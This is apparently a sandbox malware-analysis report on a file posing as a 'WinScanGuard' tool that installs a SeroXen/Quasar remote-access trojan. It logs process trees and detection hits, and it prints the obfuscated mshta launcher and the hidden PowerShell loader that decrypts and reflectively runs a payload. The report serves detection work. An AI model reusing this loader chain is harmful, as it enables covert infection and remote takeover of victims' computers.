              Source: unknownProcess created: C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-bWTLJBKbogHiYUerhoAr4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{b60ad232-6d40-4822-9220-52a4d3050cb3}
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{603825cb-58d6-4ab4-99a0-2fdb5cd309d6}
              Source: C:\Windows\$sxr-mshta.exeProcess created: C:\Windows\$sxr-cmd.exe "C:\Windows\$sxr-cmd.exe" /c %$sxr-bWTLJBKbogHiYUerhoAr4312:&#<?=%
              Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] 
-join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqW
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d814285b-904f-4c3a-8cab-4579f96b72d9}
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{f835588e-a1ef-4d6b-bc1e-b44ddb22d787}
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\$sxr-powershell.exe "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5088).WaitForExit();[System.Threading.Thread]::Sleep(5000); function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] 
-join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXd
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ee0091e4-9e0c-4ff3-b26f-57d4a238bd7c}
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{f5381469-1700-4694-82dd-1722ad94b3e0}
              Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{f78b27af-93da-4459-95e7-4c5d26a44dc8}
              Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{85d85a52-fed6-47b1-b615-c3a69ff1ad14}
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{8c0bd129-911b-4af2-a0bc-93995d45cd5f}
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{0979c3ff-3e63-4ea9-9d2b-0e24c33cbca9}
              Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{59453cd9-80c7-4c7f-84ca-38ec20f032b9}
              Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8b9e4941-156b-4561-b75c-88dc752d3d8b}
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{da1a065e-b06d-4c17-9fd5-69413fe213f9}
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{2c62f067-a6a0-49cc-8f1a-bf6b18a4e5be}
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: unknown unknown
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{f78b27af-93da-4459-95e7-4c5d26a44dc8}
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{85d85a52-fed6-47b1-b615-c3a69ff1ad14}
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{59453cd9-80c7-4c7f-84ca-38ec20f032b9}
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8b9e4941-156b-4561-b75c-88dc752d3d8b}
              Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknown
              Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknown
              Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknown
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_0000000140001014 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindCloseChangeNotification,RegOpenKeyExW,RegDeleteValueW,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,RtlDeleteBoundaryDescriptor,HeapAlloc,GetProcessHeap,HeapFree,RtlDeleteBoundaryDescriptor,6_2_0000000140001014
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 7_2_0040133E GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,7_2_0040133E
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 15_2_0040133E GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,15_2_0040133E
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_00401B33 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,23_2_00401B33
              Source: C:\Windows\$sxr-powershell.exeWMI Queries: IWbemServices::ExecNotificationQuery - root\cimv2 : select * from Win32_ProcessStartTrace
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gnhdjmxp.ad2.ps1
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF61551FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,16_2_00007FF61551FB54
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\$sxr-powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\$sxr-powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6800:120:WilError_03
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7132
              Source: C:\Windows\$sxr-powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
              Source: C:\Windows\$sxr-powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\b7db7e25-c958-4026-9103-c339a6fa4d6d
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:792:120:WilError_03
              Source: C:\Windows\$sxr-mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: WinScanGuard_v.2.1.batStatic file information: File size 13030371 > 1048576
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.sharpdx.dxgi.pdb.compressed|||SharpDX.DXGI.pdb|D73E59804E3EE494A4612185771F7F67B2FD64AE|34752 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.sharpdx.direct3d11.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: mshta.pdbGCTL source: $sxr-mshta.exe, 0000000D.00000000.1920454183.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp, $sxr-mshta.exe, 0000000D.00000002.2918096738.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp, $sxr-mshta.exe.2.dr
              Source: Binary string: costura.costura.pdb.compressed source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C8051D000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.sharpdx.pdb.compressed|||SharpDX.pdb|1A7C10AA582CCEEBFFD9BC77A11353AAAE6417E9|42824 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: #costura.sharpdx.dxgi.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.sharpdx.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net452\Microsoft.Win32.TaskScheduler.pdbSHA256 source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: cmd.pdb source: $sxr-cmd.exe, 00000010.00000000.1933753020.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp, $sxr-cmd.exe, 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp, $sxr-cmd.exe.2.dr
              Source: Binary string: mshta.pdb source: $sxr-mshta.exe, 0000000D.00000000.1920454183.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp, $sxr-mshta.exe, 0000000D.00000002.2918096738.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp, $sxr-mshta.exe.2.dr
              Source: Binary string: <Module>costura.metadatacostura.sharpdx.direct3d11.pdb.compressedcostura.costura.pdb.compressedcostura.sharpdx.dxgi.pdb.compressedcostura.sharpdx.pdb.compressedcostura.sharpdx.direct3d11.dll.compressedcostura.costura.dll.compressedcostura.sharpdx.dxgi.dll.compressedcostura.gma.system.mousekeyhook.dll.compressedcostura.system.runtime.interopservices.runtimeinformation.dll.compressedcostura.quasar.common.dll.compressedcostura.newtonsoft.json.dll.compressedcostura.bouncycastle.crypto.dll.compressedcostura.ionic.zip.dll.compressedcostura.microsoft.win32.taskscheduler.dll.compressedcostura.de.microsoft.win32.taskscheduler.resources.dll.compressedcostura.pl.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-cn.microsoft.win32.taskscheduler.resources.dll.compressedcostura.fr.microsoft.win32.taskscheduler.resources.dll.compressedcostura.es.microsoft.win32.taskscheduler.resources.dll.compressedcostura.it.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-hant.microsoft.win32.taskscheduler.resources.dll.compressedcostura.ru.microsoft.win32.taskscheduler.resources.dll.compressedcostura.protobuf-net.dll.compressedcostura.sharpdx.dll.compressed4a731784-801d-481b-a36f-654a2936777eQuasar.Client.InstallStager.exeQuasar.Client.UninstallStager.exeQuasar.Client.ResetPatcher.binQuasar.Client.QuasarApplication.resourcesQuasar.Client.Properties.Resources.resourcesILRepack.List source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\C5\Documents\SeroXen Stuff\Quasar-master\Quasar-master-release\bin\Release\net452\REPOS\seroxen rootkit stuff\InstallStager\bin\Release\InstallStager.pdb source: $sxr-powershell.exe, 00000012.00000002.3104746555.000002853878B000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.sharpdx.dxgi.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PHZMpSLEzcFKaRUZszZmeOVApLd.exe, 00000025.00000000.2071708899.000000000059E000.00000002.00000001.01000000.0000000E.sdmp, PHZMpSLEzcFKaRUZszZmeOVApLd.exe, 00000027.00000000.2076760645.000000000059E000.00000002.00000001.01000000.0000000E.sdmp, PHZMpSLEzcFKaRUZszZmeOVApLd.exe, 0000002B.00000000.2087575742.000000000059E000.00000002.00000001.01000000.0000000E.sdmp
              Source: Binary string: cmd.pdbUGP source: $sxr-cmd.exe, 00000010.00000000.1933753020.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp, $sxr-cmd.exe, 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp, $sxr-cmd.exe.2.dr
              Source: Binary string: costura.sharpdx.direct3d11.pdb.compressed|||SharpDX.Direct3D11.pdb|A2259A45EA284247B3AA65EC9C1DBEBD47FE208F|78220 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: powershell.pdbUGP source: WinScanGuard_v.2.1.bat.exe, 00000002.00000000.1726165397.00007FF60EAAA000.00000002.00000001.01000000.00000003.sdmp, $sxr-powershell.exe.2.dr, WinScanGuard_v.2.1.bat.exe.0.dr
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net452\Microsoft.Win32.TaskScheduler.pdb source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: powershell.pdb source: WinScanGuard_v.2.1.bat.exe, 00000002.00000000.1726165397.00007FF60EAAA000.00000002.00000001.01000000.00000003.sdmp, $sxr-powershell.exe.2.dr, WinScanGuard_v.2.1.bat.exe.0.dr
              Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: )costura.sharpdx.direct3d11.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ura.costura.pdb.X source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.costura.pdb.compressed8 source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe Unpacked PE file: 37.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2100000.2.unpack
Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe Unpacked PE file: 37.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2270000.5.unpack
Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe Unpacked PE file: 37.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2290000.6.unpack
Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe Unpacked PE file: 37.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2310000.8.unpack
Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe Unpacked PE file: 39.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2420000.4.unpack
Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe Unpacked PE file: 39.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2440000.5.unpack
Source: Yara match File source: 18.2.$sxr-powershell.exe.28538ad9110.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.$sxr-powershell.exe.28538ad9110.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2138245203.0000020C8051D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: WinScanGuard_v.2.1.bat.exe PID: 7128, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: $sxr-powershell.exe PID: 5088, type: MEMORYSTR
Source: 18.2.$sxr-powershell.exe.28538f11f48.20.raw.unpack, DynamicUtils.cs .Net Code: CreateSharpArgumentInfoArray
Source: 18.2.$sxr-powershell.exe.28538f11f48.20.raw.unpack, LateBoundReflectionDelegateFactory.cs .Net Code: CreateDefaultConstructor
Source: C:\Windows\$sxr-powershell.exe Anti Malware Scan Interface: Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.Ciphe
Source: C:\Windows\$sxr-cmd.exe Process created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object 